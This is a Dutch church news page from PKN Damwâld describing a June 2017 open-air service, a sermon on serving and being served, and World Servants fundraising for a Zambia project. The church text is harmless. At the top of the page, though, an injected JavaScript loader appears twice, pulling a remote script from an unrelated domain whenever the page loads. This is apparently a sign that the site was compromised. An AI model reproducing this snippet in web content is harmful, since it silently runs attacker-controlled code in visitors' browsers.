;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); ;(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,"script","https://treegreeny.org/KDJnCSZn"); Zonnige en geslaagde openluchtdienst! - PKN Damwâld

Zonnige en geslaagde openluchtdienst!

Gepubliceerd op: zondag 11 juni 2017

Vanochtend vond je jaarlijkse openluchtdienst plaats, georganiseerd door de evangelisatiecommissie. Klaeilûd zorgde voor de muzikale begeleiding en Wiebe Feddema praatte ons bij over het thema “to love to serve” of in het Nederlands ‘Liefde is dienen’ of  misschien ‘dienen is liefde’?

Wij mogen als christen graag klaar staan om een ander te dienen, kijk naar de vele vrijwilligers in de kerk of de World Servants groep die naar Zambia afreist. Maar staan wij ook open om gediend te worden? Mogen mensen ons helpen als wij het zélf moeilijk hebben, of redden wij ons zelf wel? Jezus wil ons graag dienen, hij wil aanwezig zijn in ons leven, Jezus als gastheer van Zijn feest wil zelf onze voeten wassen (Johannes 13:1:20), maar laten wij Hem toe? Wiebe vertelde dat wij open mogen staan voor Jezus zijn liefde, zodat wij uit Zijn liefde weer anderen mogen dienen. To love to serve!

World Servants Damwoude was ook aanwezig om hun actie seizoen af te sluiten. Zij konden met vreugde vermelden dat door alle acties het streefbedrag van 26.700 euro gehaald hadden! Om het project in Zambia financieel rond te krijgen wordt nu gespaard voor de extra bijdrage, door World Servants de “Challenge” genoemd. Tijdens de dienst werd het collectproject van het jeugdwerk afgesloten en werd maar liefst een bedrag van € 1.627,84 overhandigd aan de World Servants Groep! Zij waren enorm onder de indruk dat de kinderen en jongeren het afgelopen jaar zo goed voor hun en de mensen in Zambia hadden gespaard!

Wij kijken terug op een zeer geslaagde dienst en kijken alweer uit naar volgend jaar!